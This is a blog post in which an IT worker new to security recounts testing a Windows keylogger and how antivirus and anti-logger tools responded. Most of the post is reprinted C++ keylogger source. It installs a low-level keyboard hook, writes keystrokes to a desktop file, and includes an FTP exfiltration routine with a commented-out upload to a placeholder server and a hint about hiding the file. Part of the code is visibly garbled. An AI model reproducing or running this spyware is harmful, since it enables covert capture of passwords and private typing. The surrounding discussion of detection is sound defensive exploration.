A Short Journey into the Realm of Keyloggers

Although my experience as an IT person approaches almost two decades, I’m brand new in the field of cyber security. When I started working on this branch, just out of curiosity, I did some small experiments on some codes and programs. The first area drawing my attention was the keyloggers.

I found the following C++ code from Rohitab website. I successfully compile and run it. It’s name was “Keylogger.exe”.


 
 #pragma comment (lib,"wininet.lib")
    #include <windows.h>
    #include <wininet.h> //for uploadFile function
    #include <shlobj.h>
    #include <iostream>
 
char * extractFilename(char * path){
char * ret = path;
bool isFullPath = false;
for (int i=0;i D:\Folder
    
      /*Upload file to server*/
    BOOL uploadFile( char *filename, char *destination_name,char *address,char *username,char *password)
    {
            BOOL t = false;
            HINTERNET hint,hftp;
            hint = InternetOpen("FTP",INTERNET_OPEN_TYPE_PRECONFIG,0,0,INTERNET_FLAG_ASYNC);
            hftp = InternetConnect(hint,address,INTERNET_DEFAULT_FTP_PORT,username,password,INTERNET_SERVICE_FTP,0,0);
            t = FtpPutFile(hftp,filename,destination_name,FTP_TRANSFER_TYPE_BINARY ,0);
            InternetCloseHandle(hftp);
            InternetCloseHandle(hint);
            return t;
    }
    
     static int keysPressed = 0; //Lets count the keys pressed
    
    LRESULT WINAPI Keylogger (int nCode, WPARAM wParam, LPARAM lParam)
    {
            char currentDirectory[260];
                    char * workFullPath;
                  
          
        if  ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))      
        {
                bool truth = getDesktopPath(currentDirectory); //If we can capture the desktop directory then we are good
                    if (truth)
                    {
                        //Concatenate desktop directory and files
                            workFullPath = dupcat(currentDirectory,"\\work.txt",NULL); //So the file path will be like: C:\Users\Corporation\Desktop\work.txt
                            f = fopen(workFullPath,"a+"); //Open the file
                    }
            KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
            DWORD dwMsg = 1;
            dwMsg += hooked_key.scanCode << 16;
            dwMsg += hooked_key.flags << 24;             char lpszKeyName[1024] = {0};                     lpszKeyName[0] = '[';                   int i = GetKeyNameText(dwMsg,   (lpszKeyName + 1),0xFF) + 1;             int key = hooked_key.vkCode;                     lpszKeyName[i] = ']';              //Key value or something else ?                      //if the key if from A-Z,a-z,0-9 then add this to file     if (key >= 'A' && key <= 'Z')                             {                                  if  (GetAsyncKeyState(VK_SHIFT) >= 0)
                                             key += 0x20;
                                     if (f != NULL)
                                     fprintf(f,"%c", key);
                            }
                                                    //else add the name of the key.For example if the key is 32 -> Add "Space" to the file,so we know that space has been pressed.lpszKeyName is that name.
                            else
                            {
 
 
                                    if (f != NULL)
                                            fprintf(f,"%s", lpszKeyName);
                            }
                                                    keysPressed ++;
                                                    if (keysPressed == 150) //Enough data
                                                    {
                                                            //extractFilename is used to extract only the file from path:Example: C:\data\x.php,
                                                            //extractFilename("C:\\data\\x.php") => x.php so that we add only the file to ftp
                                                           //// uploadFile(workFullPath,extractFilename(workFullPath),"www.xyz.org","ftpUsername","ftpPassword"); //Upload the file to FTP
                                                            keysPressed = 0;
                                                    }
    
                            //You can make the file hidden :))
                            //hide_file(workFullPath);
                            fclose(f);
            }
        return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
    }
 
    DWORD WINAPI JACKAL(LPVOID lpParm)
    {
            HINSTANCE hins;
            hins = GetModuleHandle(NULL);
            hKeyboardHook = SetWindowsHookEx (  WH_KEYBOARD_LL, (HOOKPROC) Keylogger,   hins,  0);
    
            MSG message;
        while (GetMessage(&message,NULL,0,0))
        {
            TranslateMessage( &message );
            DispatchMessage( &message );
        }
    
        UnhookWindowsHookEx(hKeyboardHook);
        return 0;
    }
 
    
    void main(){
            JACKAL(NULL);
    }


Then when the keylogger.exe program was running, I started a text editor and some other programs and typed some keys. Yes, indeed the program could log all the keystrokes I was typing. And most interestingly, none of the the Anti Virus programs (including McAfee, AVG, Malware Bytes) I was using detected this situation. This situation indeed disturbed me a lot. Are we that vulnerable?

The code above just hooks to key strokes of other programs. I would expect the AVs to be able to follow this behaviour. I continued my research. This time I tried an Assembly code by Code Project website which is not even bound to Win Hooks:

Assembly Keylogger Sample

Not surprisingly the exe binary didn’t catch any attention during running. I started loosing my faith in cyber security. Then a friend of mine suggested trying the programs with Antilogger programs. Thus I downloaded and used Zemana Antilogger from its website.

The antilogger program indeed successfully detect the first program. It didn’t detect the second program as malicious but successfully blocked it running by the help of its encryption mechanism which blocks other program interfering into the traffic of keystrokes.

Lessons Learned:

1) Do never feel secure, use screen keyboard for sensitive information,

2) Definitely use an Antilogger program.

3) Be happy and dance